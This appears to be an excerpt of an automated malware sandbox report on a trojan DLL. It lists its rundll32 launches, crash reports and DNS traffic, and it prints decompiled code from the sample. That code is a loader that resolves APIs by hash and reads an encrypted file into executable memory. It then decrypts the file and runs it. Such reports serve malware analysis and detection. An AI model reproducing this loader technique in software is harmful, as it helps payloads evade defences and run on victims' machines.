Sep 15, 2021 13:56:41.461236954 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Sep 15, 2021 13:57:12.915996075 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Sep 15, 2021 13:57:12.960661888 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Sep 15, 2021 13:57:14.534009933 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Sep 15, 2021 13:57:14.574210882 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5

Code Manipulations

Statistics

CPU Usage


Memory Usage


High Level Behavior Distribution


Behavior


System Behavior

General

Start time:13:55:35
Start date:15/09/2021
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll'
Imagebase:0xf00000
File size:116736 bytes
MD5 hash:542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:13:55:36
Start date:15/09/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1
Imagebase:0x150000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:13:55:36
Start date:15/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll,uvlcopdlxoed
Imagebase:0xd0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:13:55:36
Start date:15/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1
Imagebase:0xd0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:13:55:39
Start date:15/09/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 812
Imagebase:0x1270000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:13:55:40
Start date:15/09/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 804
Imagebase:0x1270000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:13:55:40
Start date:15/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',uvlcopdlxoed
Imagebase:0xd0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:13:55:44
Start date:15/09/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 804
Imagebase:0x1270000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis

    Executed Functions

    C-Code - Quality: 37%
    			E100010A0(void* __eflags) {
    				long _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				short _v536;
    				intOrPtr* _t24;
    				intOrPtr* _t25;
    				void* _t33;
    				void* _t34;
    				void* _t37;
    				signed char _t49;
    				void* _t53;
    
    				_v8 = 0;
    				_t47 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
    				_v12 = E10001000( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8a111d91);
    				_t24 = E10001000( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0xcbec1a0);
    				_t25 = E10001000(_t47, 0xa4f84a9a);
    				_v16 = E10001000(_t47, 0x433a3842);
    				E10001000(_t47, 0xa5f15738);
    				 *_t24(0x103,  &_v536);
    				 *_t25( &_v536, L"\\t8vkb8377ta67uaw82uc");
    				_t33 = CreateFileW( &_v536, 0x80000000, 7, 0, 3, 0x80, 0);
    				_t34 = VirtualAlloc(0, 0x1a05, 0x3000, 0x40); // executed
    				_t53 = _t34;
    				ReadFile(_t33, _t53, 0x1a05,  &_v8, 0);
    				_t49 = 0;
    				if(_v8 > 0) {
    					do {
    						asm("rol al, 1");
    						asm("ror al, 0x3");
    						asm("ror al, 0x3");
    						asm("ror al, 1");
    						asm("rol al, 0x3");
    						asm("rol dl, 0x2");
    						 *((char*)(_t53 + _t49)) = 0x86 - 0xa5 - (( *((intOrPtr*)(_t53 + _t49)) - 0x00000006 ^ 0x00000009) - _t49 - _t49 ^ _t49 ^ 0x000000b2);
    						_t49 = _t49 + 1;
    					} while (_t49 < _v8);
    				}
    				_t37 =  *_t53(); // executed
    				return _t37;
    			}

    APIs
    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 10001143
    • VirtualAlloc.KERNEL32(00000000,00001A05,00003000,00000040), ref: 10001156
    • ReadFile.KERNEL32(00000000,00000000,00001A05,00000000,00000000), ref: 10001167
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.307354018.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.307330926.0000000010000000.00000002.00020000.sdmp
    • Associated: 00000002.00000002.307374346.0000000010002000.00000002.00020000.sdmp
    Similarity
    • API ID: File$AllocCreateReadVirtual
    • String ID: \t8vkb8377ta67uaw82uc
    • API String ID: 3585551309-93217303
    • Opcode ID: 9da5eaaed229b0b50d64fc0b6fc99207859a0f4069733da660f8d020233ccc00
    • Instruction ID: 91844a513c5d040e2c45465d2b0d2c2fbea26ce0bec0a48b99992c2b9b9d8687
    • Opcode Fuzzy Hash: 9da5eaaed229b0b50d64fc0b6fc99207859a0f4069733da660f8d020233ccc00
    • Instruction Fuzzy Hash: 1021D635A41308BFFB11D7B48C8AFCEB7ACEB1A791F500095F604E7281D574BA458A60
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions